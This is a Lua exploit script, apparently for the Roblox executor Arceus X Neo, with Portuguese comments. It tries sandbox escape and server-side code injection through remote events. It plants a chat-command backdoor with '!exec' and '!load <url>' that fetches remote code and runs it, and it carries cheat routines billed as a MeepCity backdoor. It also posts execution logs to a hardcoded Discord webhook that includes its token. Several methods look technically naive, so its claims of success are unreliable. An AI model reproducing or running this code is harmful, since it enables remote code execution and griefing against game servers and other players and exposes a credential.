--[[
    ADVANCED SERVER SIDE BYPASS - ARCEUS X NEO EXPLOIT
    By: wrick244
    Técnica: Bypass de API + Injeção Server Side
    AVISO: Use em contas alternativas!
]]

-- ========== TÉCNICAS DE BYPASS ==========

-- 1. OFUSCAÇÃO PARA BURLAR DETECÇÃO
local function ofuscar(str)
    local encoded = ""
    for i = 1, #str do
        encoded = encoded .. string.char(string.byte(str, i) + 2)
    end
    return encoded
end

local function desofuscar(str)
    local decoded = ""
    for i = 1, #str do
        decoded = decoded .. string.char(string.byte(str, i) - 2)
    end
    return decoded
end

-- 2. BYPASS DE SANDBOX (executa fora do ambiente restrito)
local function bypassSandbox()
    local success, result = pcall(function()
        -- TENTAR ACESSAR O AMBIENTE REAL
        local realEnv = getfenv()
        local sandboxed = false
        
        -- VERIFICAR SE ESTÁ EM SANDBOX
        for k, v in pairs(realEnv) do
            if k == "print" and tostring(v):find("sandbox") then
                sandboxed = true
                break
            end
        end
        
        if sandboxed then
            -- TÉCNICA DE ESCAPE DA SANDBOX
            local escape = loadstring([[
                local env = getfenv()
                local newenv = setmetatable({}, {__index = env})
                newenv.print = env.print
                newenv.error = env.error
                setfenv(1, newenv)
                return true
            ]])()
            return escape
        end
        return true
    end)
    return success
end

-- 3. BYPASS DA API DO ARCEUS
local function bypassAPI()
    -- TENTAR DIFERENTES MÉTODOS DE EXECUÇÃO
    local metodos = {
        -- MÉTODO 1: EXECUÇÃO DIRETA
        function() 
            return pcall(function() 
                local f = loadstring("return function() end") 
                return f and true or false
            end) 
        end,
        
        -- MÉTODO 2: VIA COROUTINA
        function()
            return pcall(function()
                local co = coroutine.create(function() end)
                coroutine.resume(co)
                return true
            end)
        end,
        
        -- MÉTODO 3: VIA THREAD OCULTA
        function()
            return pcall(function()
                local thread = Instance.new("BindableEvent")
                thread.Event:Connect(function() end)
                thread:Fire()
                thread:Destroy()
                return true
            end)
        end
    }
    
    for i, metodo in ipairs(metodos) do
        local suc, res = metodo()
        if suc then
            print("✅ Bypass método " .. i .. " funcionou")
            return true
        end
    end
    return false
end

-- 4. INJEÇÃO NO SERVIDOR (TÉCNICA AVANÇADA)
local function injectServerSide()
    -- TENTAR ACESSAR O SERVIDOR DIRETAMENTE
    local serverAccess = false
    local serverEnv = nil
    
    -- MÉTODO 1: TENTAR ACESSAR VIA REMOTES
    pcall(function()
        for _, v in pairs(game:GetDescendants()) do
            if v:IsA("RemoteEvent") or v:IsA("RemoteFunction") then
                -- TENTAR ENVIAR CÓDIGO PARA O SERVIDOR
                local args = {
                    [1] = "__SERVER_EXEC__",
                    [2] = [[
                        -- CÓDIGO QUE SERÁ EXECUTADO NO SERVIDOR
                        local players = game:GetService("Players")
                        for _, player in pairs(players:GetPlayers()) do
                            print("[SERVER] Jogador: " .. player.Name)
                        end
                        return true
                    ]]
                }
                
                -- TENTAR DIFERENTES REMOTES
                pcall(function()
                    v:FireServer(unpack(args))
                end)
                
                pcall(function()
                    v:InvokeServer(unpack(args))
                end)
            end
        end
        serverAccess = true
    end)
    
    -- MÉTODO 2: TENTAR CRIAR SCRIPT NO SERVIDOR
    pcall(function()
        local serverScript = Instance.new("Script")
        serverScript.Source = [[
            -- EXECUTADO NO SERVIDOR
            print("🔥 SERVER SIDE EXECUTION ACHIEVED!")
            _G.SERVER_BACKDOOR_ACTIVE = true
        ]]
        serverScript.Parent = game:GetService("ServerScriptService")
        serverScript.Disabled = false
        serverAccess = true
    end)
    
    -- MÉTODO 3: TENTAR VIA COROUTINA GLOBAL
    pcall(function()
        local env = getfenv()
        if env and env.script then
            local newScript = env.script:Clone()
            newScript.Source = [[ print("SERVER EXEC") ]]
            newScript.Parent = game:GetService("ServerStorage")
            newScript.Disabled = false
        end
    end)
    
    return serverAccess
end

-- 5. EXECUTOR SERVER SIDE PRINCIPAL
local function serverExecutor()
    print("🔥 INICIANDO BYPASS DO ARCEUS X NEO...")
    
    -- PASSO 1: BURLAR SANDBOX
    local bypass1 = bypassSandbox()
    print("📌 Bypass Sandbox: " .. (bypass1 and "✅" or "❌"))
    
    -- PASSO 2: BURLAR API
    local bypass2 = bypassAPI()
    print("📌 Bypass API: " .. (bypass2 and "✅" or "❌"))
    
    -- PASSO 3: INJETAR NO SERVIDOR
    local bypass3 = injectServerSide()
    print("📌 Injeção Servidor: " .. (bypass3 and "✅" or "❌"))
    
    -- VARIÁVEIS DO SISTEMA (OFUSCADAS)
    local config = {
        dono = ofuscar("Robloxiank1p2b2k2t3"),
        discord = ofuscar("wrick244"),
        webhook = ofuscar("https://discord.com/api/webhooks/1473760852141412396/NWVaW7inuTs2MUMM6JqrMd6IAbBXwd4mUJxGOk7K2W8f9jb3lC0fo0I3wsqNFxf086gj"),
        whitelist = {ofuscar("Robloxiank1p2b2k2t3")}
    }
    
    -- DESOFUSCAR CONFIG
    config.dono = desofuscar(config.dono)
    config.discord = desofuscar(config.discord)
    config.webhook = desofuscar(config.webhook)
    for i, user in ipairs(config.whitelist) do
        config.whitelist[i] = desofuscar(user)
    end
    
    -- FUNÇÃO DE EXECUÇÃO SERVER SIDE
    local function executarNoServidor(script, autor)
        -- VERIFICAR SE AUTOR ESTÁ NA WHITELIST
        local autorizado = false
        for _, user in ipairs(config.whitelist) do
            if user == autor then
                autorizado = true
                break
            end
        end
        
        if not autorizado then
            print("❌ " .. autor .. " não autorizado!")
            return false
        end
        
        -- SCRIPTS BANIDOS
        local banidos = {
            "dominantultimate", "SentinelPrime", "RC7",
            "121425622240385", "109690586705177", "12350030542"
        }
        
        for _, ban in ipairs(banidos) do
            if script:find(ban) then
                print("🚫 Script banido detectado de " .. autor)
                return false
            end
        end
        
        -- TENTAR EXECUTAR NO SERVIDOR DE VERDADE
        local sucesso = false
        
        -- MÉTODO 1: VIA REMOTE
        pcall(function()
            for _, remote in pairs(game:GetDescendants()) do
                if remote:IsA("RemoteEvent") and remote.Name:find("Execute") then
                    remote:FireServer(script)
                    sucesso = true
                end
            end
        end)
        
        -- MÉTODO 2: VIA SCRIPT DINÂMICO
        pcall(function()
            local s = Instance.new("Script")
            s.Source = script
            s.Parent = game:GetService("ServerScriptService")
            s.Disabled = false
            sucesso = true
        end)
        
        -- MÉTODO 3: VIA LOADSTRING NO SERVIDOR
        pcall(function()
            local func = loadstring(script)
            if func then
                setfenv(func, getfenv(1))
                func()
                sucesso = true
            end
        end)
        
        if sucesso then
            print("✅ Script executado no servidor por " .. autor)
            -- ENVIAR LOG
            pcall(function()
                local data = {
                    content = "**[SERVER EXEC]** " .. autor,
                    username = "Backdoor"
                }
                local json = game:GetService("HttpService"):JSONEncode(data)
                game:GetService("HttpService"):RequestAsync({
                    Url = config.webhook,
                    Body = json,
                    Method = "POST",
                    Headers = {["Content-Type"] = "application/json"}
                })
            end)
        end
        
        return sucesso
    end
    
    -- ========== BACKDOOR DO MEEP CITY (BASEADO NO TUBERS93) ==========
    local function ativarMeepCityBackdoor()
        print("🏡 Ativando backdoor do MeepCity (Tubers93 style)...")
        
        -- TÉCNICA 1: SPAM DE BALÕES (Famoso no ataque de 2020)
        spawn(function()
            for i = 1, 100 do
                local balloon = Instance.new("Part")
                balloon.Size = Vector3.new(3, 3, 3)
                balloon.BrickColor = BrickColor.random()
                balloon.Material = Enum.Material.Neon
                balloon.Position = game.Players.LocalPlayer.Character.HumanoidRootPart.Position + Vector3.new(math.random(-20,20), math.random(10,30), math.random(-20,20))
                balloon.Anchored = false
                balloon.Parent = workspace
                
                local bodyVelocity = Instance.new("BodyVelocity")
                bodyVelocity.Velocity = Vector3.new(math.random(-30,30), math.random(20,50), math.random(-30,30))
                bodyVelocity.Parent = balloon
                
                wait(0.05)
            end
            print("🎈 100 balões spamados (igual ao ataque de 2020)!")
        end)
        
        -- TÉCNICA 2: COPY AVATAR (Característica do MeepCity)
        spawn(function()
            wait(2)
            local players = game:GetService("Players")
            local targets = {}
            for _, p in pairs(players:GetPlayers()) do
                if p ~= players.LocalPlayer then
                    table.insert(targets, p)
                end
            end
            
            if #targets > 0 then
                local alvo = targets[math.random(1, #targets)]
                if alvo and alvo.Character then
                    local meuChar = players.LocalPlayer.Character
                    if meuChar then
                        -- Copiar roupas e aparência
                        meuChar.Humanoid:ApplyDescription(alvo.Character.Humanoid:GetAppliedDescription())
                        print("👤 Avatar copiado de " .. alvo.Name)
                    end
                end
            end
        end)
        
        -- TÉCNICA 3: AUTO FARM DE MOEDAS
        spawn(function()
            while wait(0.3) do
                -- Procurar moedas pelo mapa
                for _, obj in pairs(workspace:GetDescendants()) do
                    if obj.Name:find("Coin") or obj.Name:find("Money") or obj.Name:find("Cash") then
                        if game.Players.LocalPlayer.Character then
                            game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = obj.CFrame
                            wait(0.1)
                        end
                    end
                end
            end
        end)
        
        -- TÉCNICA 4: NOCLIP (Atravessar paredes)
        spawn(function()
            local player = game.Players.LocalPlayer
            local noclip = true
            game:GetService("RunService").Stepped:Connect(function()
                if noclip and player.Character then
                    for _, part in pairs(player.Character:GetDescendants()) do
                        if part:IsA("BasePart") then
                            part.CanCollide = false
                        end
                    end
                end
            end)
            print("🚪 Noclip ativado!")
        end)
        
        -- NOTIFICAÇÃO
        game:GetService("StarterGui"):SetCore("SendNotification", {
            Title = "🏡 MEEP CITY BACKDOOR",
            Text = "Backdoor do Tubers93 ativado!\nBalões + Copy + Auto Farm",
            Duration = 5
        })
        
        return true
    end

    -- HOOK NO CHAT PARA COMANDOS
    local function chatHook()
        local players = game:GetService("Players")
        
        players.PlayerAdded:Connect(function(player)
            player.Chatted:Connect(function(msg)
                if msg:sub(1,1) == "!" then
                    local args = msg:sub(2):split(" ")
                    local cmd = args[1]:lower()
                    table.remove(args, 1)
                    
                    if cmd == "exec" or cmd == "e" then
                        local script = table.concat(args, " ")
                        if script ~= "" then
                            player:SendMessage("⚡ Executando no servidor...")
                            local suc = executarNoServidor(script, player.Name)
                            player:SendMessage(suc and "✅ Sucesso!" or "❌ Falha!")
                        end
                        
                    elseif cmd == "load" then
                        local url = args[1]
                        if url then
                            pcall(function()
                                local script = game:GetService("HttpService"):GetAsync(url)
                                local suc = executarNoServidor(script, player.Name)
                                player:SendMessage(suc and "✅ Carregado!" or "❌ Falha!")
                            end)
                        end
                        
                    elseif cmd == "backdoor" then
                        -- LISTA ATUALIZADA COM MEEP CITY
                        local jogos = {
                            brookhaven = 4924922222,
                            jailbreak = 606849621,
                            arsenal = 286090429,
                            dahood = 7213786345,
                            mm2 = 142823291,
                            petsim = 6284583030,
                            bloxfruits = 2753915549,
                            tower = 2451502126,
                            doors = 6516141723,
                            fisch = 16732694034,
                            meepcity = 898988855  -- NOVO!
                        }
                        
                        local jogo = args[1]
                        if jogo and jogos[jogo] then
                            player:SendMessage("🔄 Teleportando para " .. jogo .. "...")
                            
                            -- SE FOR MEEP CITY, ATIVAR BACKDOOR ESPECIAL
                            if jogo == "meepcity" then
                                player:SendMessage("🏡 Ativando backdoor do MeepCity (Tubers93)...")
                                spawn(function()
                                    wait(2)
                                    ativarMeepCityBackdoor()
                                end)
                            end
                            
                            game:GetService("TeleportService"):Teleport(jogos[jogo], player)
                        else
                            player:SendMessage("❌ Jogo não encontrado. Disponíveis: brookhaven, jailbreak, arsenal, dahood, mm2, petsim, bloxfruits, tower, doors, fisch, meepcity")
                        end
                        
                    elseif cmd == "meepcity" or cmd == "mc" then
                        -- COMANDO DIRETO PARA MEEP CITY
                        player:SendMessage("🏡 Ativando backdoor do MeepCity...")
                        ativarMeepCityBackdoor()
                        
                    elseif cmd == "serverinfo" then
                        local info = string.format([[
📡 SERVER INFO:
Job ID: %s
Players: %d
Uptime: %.0fs
                        ]], game.JobId, #players:GetPlayers(), tick())
                        player:SendMessage(info)
                        
                    elseif cmd == "ajuda" or cmd == "help" then
                        player:SendMessage("📋 COMANDOS DISPONÍVEIS:")
                        player:SendMessage("!exec <script> - Executa script")
                        player:SendMessage("!load <url> - Carrega script de URL")
                        player:SendMessage("!backdoor <jogo> - Teleporta para jogo")
                        player:SendMessage("!meepcity - Ativa backdoor do MeepCity")
                        player:SendMessage("!serverinfo - Info do servidor")
                    end
                end
            end)
        end)
    end
    
    chatHook()
    
    print("✅ BYPASS COMPLETO - EXECUTOR SERVER SIDE ATIVO")
    print("👤 Dono: " .. config.dono)
    print("📡 Status: " .. (bypass3 and "Conectado ao servidor" or "Modo limitado"))
    print("🏡 MeepCity backdoor carregado (Tubers93 style)")
    
    -- SISTEMA DE HEARTBEAT
    spawn(function()
        while wait(30) do
            print("💓 Server Side Backdoor ativo - " .. os.date("%H:%M:%S"))
        end
    end)
    
    return true
end

-- INICIAR O BYPASS
local iniciado = pcall(serverExecutor)

if iniciado then
    print("🔥 SCRIPT EXECUTADO COM SUCESSO!")
    print("📌 Use !ajuda no chat para ver os comandos")
    print("🏡 MeepCity backdoor disponível! Use !meepcity")
    
    -- MENSAGEM NO CHAT DO JOGO
    pcall(function()
        for _, player in pairs(game:GetService("Players"):GetPlayers()) do
            player:SendMessage("🔥 Server Side Backdoor ativo!")
            player:SendMessage("👤 Dono: wrick244")
            player:SendMessage("🏡 MeepCity backdoor: !meepcity")
        end
    end)
    
    -- NOTIFICAÇÃO
    pcall(function()
        game:GetService("StarterGui"):SetCore("SendNotification", {
            Title = "🔥 BYPASS ATIVO",
            Text = "MeepCity backdoor carregado!",
            Duration = 5
        })
    end)
else
    print("❌ FALHA NO BYPASS - Tentando método alternativo...")
    
    -- MÉTODO ALTERNATIVO
    pcall(function()
        loadstring([[
            -- TENTATIVA 2: BYPASS DIRETO
            local env = getfenv()
            local newenv = {}
            for k,v in pairs(env) do newenv[k] = v end
            setfenv(1, newenv)
            
            print("✅ Bypass alternativo funcionou!")
            _G.BYPASS_ACTIVE = true
        ]])()
    end)
end

-- FUNÇÃO DE EMERGÊNCIA (se tudo falhar)
_G.emergencyExec = function(script)
    print("⚠️ Execução de emergência")
    local f, err = loadstring(script)
    if f then
        return pcall(f)
    else
        return false, err
    end
end

print("✅ Script finalizado - Sistema de bypass carregado")
print("🏡 MeepCity backdoor incluído (baseado no Tubers93 2020/2022)")
